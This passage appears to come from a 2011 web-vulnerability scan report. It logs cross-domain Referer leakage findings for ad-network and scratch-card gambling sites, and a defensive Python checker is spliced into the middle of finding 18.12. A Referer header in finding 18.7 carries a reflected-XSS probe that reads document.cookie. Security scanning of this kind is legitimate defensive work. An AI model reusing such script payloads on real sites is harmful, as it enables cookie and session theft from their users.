})();document.write('<img src="http://audit.303br.net?anId=28&pubId=1709175&advId=431270&vurlId=6127792&campId=3017893&vURL=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D4408%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere">');

18.7. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=10ca289019af23418475b1d5b7b65193; expires=Tue, 15-May-2012 12:52:09 GMT; path=/
Content-Length: 3694
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90&section=1703625"></SCRIPT>
...[SNIP]...

18.8. http://home.okscratchcards.com/Promotions.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /Promotions.aspx?&mmi=15538 HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37519


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/okscratchcards/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a href="/" title="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com">
            <img src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/MasterHeader.jpg" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" />
           </a>
...[SNIP]...
<br /><a href="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html" target="_blank" >
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_header.jpg" /></a>
...[SNIP]...
real chance to win the Jackpot, you've come to the right place!
Check out our daily promotions to see what incredible offers, tournaments and prizes we've got in store for you!
<a class="PromotionPageLinks" href="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html" target="_blank">Click here to see our upcoming promotions</a>
...[SNIP]...
<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/5FreePromotion_ENG_GBP.jpg" /></a>
...[SNIP]...
<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_midle_right.jpg" /></a>
...[SNIP]...
<a href="InviteFriend.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_bottom_left.jpg" /></a>
...[SNIP]...
<a href="PlayersClub.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_bottom_right.jpg" /></a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
<MAP NAME=footerMapping>
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="" coords="200,0,286,50" target="_blank" />
<area href="http://www.neogames.com/" alt="" coords="290,0,410,50" target="_blank" />
<area href="UnderAge.aspx" alt="" coords="414,0,450,50" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" ALT="" coords="454,0,545,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="" coords="554,0,620,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="" coords="625,0,780,50" target="_blank" />
</MAP>
...[SNIP]...
<td class="FooterControlImageCell"><img alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/bottom.gif" USEMAP="#footerMapping" /></td>
...[SNIP]...
e EU since May 2007). The Company's registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates okscratchcards.com under a provisional license issued and regulated by the <a target="_blank" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf">Lotteries and Gaming Authority</a>
...[SNIP]...

18.9. http://home.okscratchcards.com/visit.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /visit.aspx

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following link to another domain:

Request

GET /visit.aspx?lr=1&&mmi=15538 HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 12:14:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Location: https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=20&SKI=0&CUR=GBP&LNG=ENG&AFI=20&MMI=15538&PRD=&UNIQUEVISITORID=0D6B21683BA25FC6246FC1B2BA546DE0&AR=&PAR=&REGISTRATIONMODE=PM&BO=FM&BD=home.okscratchcards.com&SDN=okscratchcards.com&CORID=&SENTDATE=&COREXPDATE=&GID=
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:23 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 460

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=20&amp;SKI=0&amp;CUR=GBP&amp;LNG=ENG&amp;AFI=20&amp;MMI=15538&amp;PRD=&amp;UNIQUEVISITORID=0D6B21683BA25FC6246FC1B2BA546DE0&amp;AR=&amp;PAR=&amp;REGISTRATIONMODE=PM&amp;BO=FM&amp;BD=home.okscratchcards.com&amp;SDN=okscratchcards.com&amp;CORID=&amp;SENTDATE=&amp;COREXPDATE=&amp;GID=">here</a>
...[SNIP]...

18.10. http://itunes.apple.com/us/app/pclottery/id399201446

Summary

Severity:   Information
Confidence:   Certain
Host:   http://itunes.apple.com
Path:   /us/app/pclottery/id399201446

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /us/app/pclottery/id399201446?mt=8 HTTP/1.1
Host: itunes.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Mon, 16 May 2011 12:13:20 GMT
x-apple-orig-url-path: /us/app/pclottery/id399201446?mt=8
x-apple-application-site: NWK
x-apple-max-age: 3600
Content-Type: text/html
x-apple-woa-inbound-url: /WebObjects/MZStore.woa/wa/viewSoftware?mt=8&id=399201446&cc=us
x-apple-application-instance: 11062
x-apple-aka-ttl: Generated Mon May 16 05:13:20 PDT 2011, Expires Mon May 16 05:14:20 PDT 2011, TTL 60s
x-webobjects-loadaverage: 0
Cache-Control: no-transform, max-age=54
Date: Mon, 16 May 2011 12:13:20 GMT
Content-Length: 23425
Connection: close
X-Apple-Partner: origin.0

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.apple.com/itms/" lang="en">


<head>

<meta http-equiv="Content-Type" conten
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/5176/web-storefront-base.cssz" />
<link rel="stylesheet" type="text/css" href="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.cssz" />


<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-base.jsz"></script>
<script type="text/javascript" charset="utf-8" src="http://r.mzstatic.com/htmlResources/5176/web-storefront-preview.jsz"></script>
...[SNIP]...
<h2><img src="http://ax.phobos.apple.com.edgesuite.net/images/web/itunes_preview/itunespreview_en.png" alt="iTunes" height="32" width="263"></h2>
...[SNIP]...
<div class="app-links"><a rel="nofollow" target="_blank" class="see-all" href="http://www.moblio.nl">moblio.nl Web Site</a><a rel="nofollow" target="_blank" class="see-all" href="http://www.postcodelottery.com/">PPLottery Support</a>
...[SNIP]...
<div class="lockup"><img src="http://a3.mzstatic.com/us/r1000/043/Purple/06/d7/f8/mzl.ravxxpan.320x480-75.jpg" alt="iPhone Screenshot 1" class="portrait" /></div><div class="lockup"><img src="http://a2.mzstatic.com/us/r1000/013/Purple/c5/65/bc/mzl.qtmygdec.320x480-75.jpg" alt="iPhone Screenshot 2" class="portrait" /></div><div class="lockup"><img src="http://a4.mzstatic.com/us/r1000/048/Purple/89/ee/78/mzl.hqiwnnbm.320x480-75.jpg" alt="iPhone Screenshot 3" class="portrait" /></div><div class="lockup"><img src="http://a2.mzstatic.com/us/r1000/025/Purple/d1/89/b2/mzl.muadfeos.320x480-75.jpg" alt="iPhone Screenshot 4" class="portrait" /></div><div class="lockup"><img src="http://a5.mzstatic.com/us/r1000/039/Purple/a5/b8/5d/mzl.algqcmgk.320x480-75.jpg" alt="iPhone Screenshot 5" class="portrait" /></div>
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/030/Purple/1a/23/ae/mzi.emwzndug.100x100-75.jpg" width="100" class="artwork" alt="Diptic" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/027/Purple/03/57/95/mzl.ymbbdpjg.100x100-75.jpg" width="100" class="artwork" alt="Booking.com - Hotel reservations for 120,000+ hotels" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/001/Purple/1d/50/0e/mzi.xelohegg.100x100-75.jpg" width="100" class="artwork" alt="AppShopper" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a5.mzstatic.com/us/r1000/017/Purple/f4/3f/3f/mzi.pvlnlbjh.100x100-75.jpg" width="100" class="artwork" alt="MobileMe Gallery" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a5.mzstatic.com/us/r1000/000/Purple/05/6c/14/mzl.kytupfun.100x100-75.jpg" width="100" class="artwork" alt="Dropbox" height="100"><span class="mask">
...[SNIP]...
<div class="artwork"><img src="http://a2.mzstatic.com/us/r1000/046/Purple/9d/d3/c3/mzl.lagruyvy.175x175-75.jpg" width="175" class="artwork" alt="PPLottery" height="175"><span class="mask">
...[SNIP]...
<div class="fbfan">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=100484820802&amp;width=230&amp;connections=0&amp;stream=false&amp;header=false&amp;height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:230px; height:63px;" allowTransparency="true"></iframe>
   </div>
   <div class="fbfan last">
       <iframe src="http://www.facebook.com/plugins/likebox.php?id=286893159420&amp;width=250&amp;connections=0&amp;stream=false&amp;header=false&amp;height=62" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:250px; height:63px;" allowTransparency="true"></iframe>
...[SNIP]...

18.11. http://primescratchcards.com/images/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://primescratchcards.com
Path:   /images/index.asp

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /images/index.asp?curr=USD&g=3 HTTP/1.1
Host: primescratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ARC=130137; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19315
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:38:00 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<center><a href="http://www.facebook.com/PrimeScratchCards" target="_blank"><img src="images/side/197x100_FB.jpg" width="197" border="0">
...[SNIP]...
</a>
       <a href="http://www.youtube.com/user/primescratchcards1" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tube.png" border="0"></a>
       <a href="http://www.facebook.com/pages/PrimeScratchCards/122783514413813" target="_blank"><img src="http://www.primescratchcards.com/images/sn/fbook.png" border="0"></a>
       <a href="http://twitter.com/PrimeScratch" target="_blank"><img src="http://www.primescratchcards.com/images/sn/tweet.png" border="0">
...[SNIP]...
<area shape="rect" coords="10,10,120,60" href="HelpDepositMethods.asp" alt="" title="" />
<area shape="rect" coords="125,10,208,60" href="http://www.gambleaware.co.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="338,9,419,59" href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" target="_blank" alt="" title="" />
<area shape="rect" coords="423,8,539,58" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" target="_blank" alt="" title="" />
<area shape="rect" coords="546,8,582,58" href="http://www.gamcare.org.uk/" target="_blank" alt="" title="" />
<area shape="rect" coords="631,4,724,54" href="http://www.lga.org.mt/" target="_blank" alt="" title="" />
<area shape="rect" coords="738,7,812,57" href="http://www.primegaming.com/" target="_blank" alt="" title="" />
<area shape="rect" coords="823,8,848,58" href="underage.asp" alt="" title="" />
...[SNIP]...

18.12. https://scratch.betsson.com/en/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /en/

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:
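Worked check for this finding (an added example; not code from the XSS.CX report or from Burp Suite). The same issue detail is repeated for 18.4 through 18.12, and the Referer header in the 18.7 request shows the leak in practice: the full ad.doubleclick.net URL, including the pageURL value that carries the reflected script payload, was sent to d.tradex.openx.com. The Python below reproduces the scanner's condition (a query string in the page URL plus cross-domain links in the response body), resolves relative links before deciding whether a target is third-party, and models the Referer a browser would send under common Referrer-Policy values so the mitigation can be verified against a response. The sample request and response are constructed from the 18.7 evidence and trimmed; function names are this example's own assumptions.

```python
"""Cross-domain Referer leakage check, modelled on the finding repeated in
section 18 of this report. Added example; not code from XSS.CX or Burp Suite.
Function names are this example's own."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit, urlunsplit

# (tag, attribute) pairs that make the browser issue a request to the URL.
URL_ATTRS = {("a", "href"), ("area", "href"), ("link", "href"), ("form", "action"),
             ("script", "src"), ("img", "src"), ("iframe", "src")}


class _LinkCollector(HTMLParser):
    """Collects raw URL-bearing attribute values in document order."""

    def __init__(self):
        super().__init__()
        self.links = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:          # HTMLParser lowercases tag and name
            if (tag, name) in URL_ATTRS and value:
                self.links.append(value.strip())


def cross_domain_links(page_url, html):
    """Absolute URLs in `html` whose host differs from that of `page_url`.
    Relative references are resolved first so '/x' and '//cdn/x' classify correctly."""
    page_host = (urlsplit(page_url).hostname or "").lower()
    collector = _LinkCollector()
    collector.feed(html)
    result = []
    for raw in collector.links:
        absolute = urljoin(page_url, raw)
        host = (urlsplit(absolute).hostname or "").lower()
        if host and host != page_host:
            result.append(absolute)
    return result


def referer_sent(page_url, target_url, policy="no-referrer-when-downgrade"):
    """Referer value a browser attaches when a document at `page_url` requests
    `target_url` under `policy`; None when no Referer is sent. Only the
    policies relevant to this finding are modelled."""
    src, dst = urlsplit(page_url), urlsplit(target_url)
    same_origin = (src.scheme, src.netloc) == (dst.scheme, dst.netloc)
    downgrade = src.scheme == "https" and dst.scheme == "http"
    full = urlunsplit((src.scheme, src.netloc, src.path, src.query, ""))  # fragment is never sent
    origin = f"{src.scheme}://{src.netloc}/"
    if policy == "no-referrer":
        return None
    if policy == "no-referrer-when-downgrade":     # browser default at the time of this report
        return None if downgrade else full
    if policy == "same-origin":
        return full if same_origin else None
    if policy == "strict-origin-when-cross-origin":
        if downgrade:
            return None
        return full if same_origin else origin
    raise ValueError(f"policy not modelled: {policy}")


def referer_leakage(page_url, html, response_headers):
    """The scanner's condition: a query string in the page URL plus cross-domain
    links in the body. Maps each third-party target to the Referer it would
    receive (None if the response's Referrer-Policy suppresses it)."""
    if not urlsplit(page_url).query:
        return {}
    headers = {k.lower(): v for k, v in response_headers.items()}
    policy = headers.get("referrer-policy", "no-referrer-when-downgrade")
    return {t: referer_sent(page_url, t, policy)
            for t in cross_domain_links(page_url, html)}


# Constructed sample, trimmed from finding 18.7: the OpenX frame URL carries a
# query string and its body loads a script from ad.yieldmanager.com.
SAMPLE_URL = "http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE"
SAMPLE_HEADERS = {"Content-Type": "text/html; charset=UTF-8"}   # no Referrer-Policy, as observed
SAMPLE_HTML = """<html><head><title>x</title></head><body>
<!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90"></SCRIPT>
<a href="/local.php">same host, not reported</a>
</body></html>"""

if __name__ == "__main__":
    for target, ref in referer_leakage(SAMPLE_URL, SAMPLE_HTML, SAMPLE_HEADERS).items():
        print(f"{target}\n    Referer: {ref}")
    hardened = dict(SAMPLE_HEADERS, **{"Referrer-Policy": "strict-origin-when-cross-origin"})
    for target, ref in referer_leakage(SAMPLE_URL, SAMPLE_HTML, hardened).items():
        print(f"{target}\n    Referer under strict-origin-when-cross-origin: {ref}")
```

Run as-is, the first loop reports the full OpenX URL, query string included, as the Referer the ad.yieldmanager.com script request would carry; the second shows that a Referrer-Policy of strict-origin-when-cross-origin reduces it to the origin. The same function applied to a page URL without a query string returns nothing, which matches the scanner's trigger. Note that the policy model covers only the values named in the code; extend it before relying on it for other values.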

Request

GET /en/?navbar=true HTTP/1.1
Host: scratch.betsson.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/
Set-Cookie: ASP.NET_SessionId=u41q3c55gc42at45o0pmid55; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:45:00 GMT
Content-Length: 160229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
<!-- cphCssDefault -->
<link media="all" href="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreCSSV2_v95924.css" type="text/css" rel="StyleSheet" />


<link media="all" href="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterCSS_v2983.css" type="text/css" rel="StyleSheet" />

<style type="text/css" media="screen">
...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js"></script>
...[SNIP]...
</ul>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
<a onclick="getIsland('StartPage.aspx','divMain','',true);return false;" href="/en/Default.aspx" >
<img src="https://ble.hs.llnwd.net/e1/scratch/en/productLogo.gif" alt=""/>
</a>
...[SNIP]...
<span id="ctl00_ctl00_cphMain_cphMain_ctl00_Gametip"><a href="https://scratch.betsson909.com/en/Classic/3-Wow">Win the dream salary with 3 wow - ...5,500 per month for 15 years!</a>
...[SNIP]...
<a href="/en/Classic/3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_lnkGame" onclick="openScratchClientWindow(0, 0, 42, '41', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_3-Wow.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl00_gameName">
...[SNIP]...
<a href="/en/Slots/Sea-And-Sun" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_lnkGame" onclick="openScratchClientWindow(0, 4, 88, '92', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Sea-And-Sun.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl01_gameName">
...[SNIP]...
<a href="/en/Slots/Holiday-Hotel" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_lnkGame" onclick="openScratchClientWindow(0, 4, 87, '89', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Holiday-Hotel.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl02_gameName">
...[SNIP]...
<a href="/en/Classic/7th-Heaven" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_lnkGame" onclick="openScratchClientWindow(0, 0, 62, '58', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_7th-Heaven.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl03_gameName">
...[SNIP]...
<a href="/en/Classic/Jungle-Joy" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_lnkGame" onclick="openScratchClientWindow(0, 0, 53, '45', 700, 464);return false;">
<img src="https://ble.hs.llnwd.net/e1/scratch/neutral/minipopular_Jungle-Joy.png" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameImgId" />
<span id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl04_gameName">
...[SNIP]...
<a href="/en/Classic/Super-3-Wow" id="ctl00_ctl00_cphMain_cphMain_ctl01_ctl00_rptGameList_ctl05_lnkGame" onclick="openScratchClientWindow(0, 0, 76, '79', 700, 464);return false;">
